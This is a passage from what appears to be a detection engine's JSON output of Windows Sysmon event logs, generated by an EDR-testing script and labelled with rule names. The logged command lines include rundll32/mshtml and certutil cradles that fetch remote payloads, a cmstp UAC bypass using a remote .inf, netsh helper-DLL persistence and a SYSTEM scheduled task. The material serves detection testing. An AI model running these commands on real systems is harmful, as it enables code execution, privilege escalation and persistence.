connectaddress=192.168.1.1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001029398B00","ParentProcessId":6760,"ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.390"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4955,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.460197Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Netsh DLL Persistence"],"event":{"Event":{"EventData":{"CommandLine":"netsh.exe add helper AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh.exe add helper AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-001051388B00","ParentProcessId":3824,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010927C8B00","ProcessId":5236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.544"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4956,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.466817Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"192.168.1.1/8000","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"747F3D96-6647-5D3F-0000-001057768B00","ProcessId":4028,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/8080","UtcTime":"2019-07-29 21:33:59.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4957,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.707406Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.367"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4962,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.057426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-DCFC-5D3F-0000-0010F1520000","ProcessId":568,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\NdisCap\\Start","UtcTime":"2019-07-29 21:34:00.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4964,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:01.660499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ProcessId":5844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.292"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4969,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.373481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test\")","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6652-5D3F-0000-0010B9708C00","ParentProcessId":5844,"ProcessGuid":"747F3D96-6652-5D3F-0000-001058828C00","ProcessId":348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:10.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4971,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:10.708142Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ProcessId":1808,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.202"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4975,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.226408Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new0ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe && exit\",0,true);}","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ParentProcessId":1808,"ProcessGuid":"747F3D96-6657-5D3F-0000-001011298D00","ProcessId":1004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4977,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:15.658168Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ProcessId":7088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4978,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.238305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ParentProcessId":7088,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010E37B8D00","ProcessId":4520,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.410"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4980,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.459065Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.2.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=89030EB0DE2B856B47105CA67DAAC722ABAF0BDF,MD5=D9818B3C3BC0AF0A5374C71272581C08,SHA256=DB3F360BDB292C0679C13149AC6F454F7DCE768BDE559D87CE718023A6985A0D,IMPHASH=109BA8ED3C458360A74EA1216207CA09","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6661-5D3F-0000-00107AB88D00","ParentProcessId":6428,"ProcessGuid":"747F3D96-6661-5D3F-0000-0010CBC88D00","ProcessId":6820,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:25.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4985,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:25.659355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-6666-5D3F-0000-0010AE068E00","ParentProcessId":1464,"ProcessGuid":"747F3D96-6666-5D3F-0000-0010DF098E00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:30.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4989,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:30.807635Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ProcessId":2916,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.243"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5000,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.261289Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Task Scheduler Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69","Image":"C:\\Windows\\System32\\schtasks.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ParentProcessId":2916,"ProcessGuid":"747F3D96-6670-5D3F-0000-0010F9148F00","ProcessId":7076,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.755"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5002,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.889027Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":768617,"Execution_attributes":{"ProcessID":264,"ThreadID":796},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:17.594374Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AC38-5CB8-0000-0010365E0800","ProcessId":3576,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 16:56:24.833"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":14,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T16:56:24.893827Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 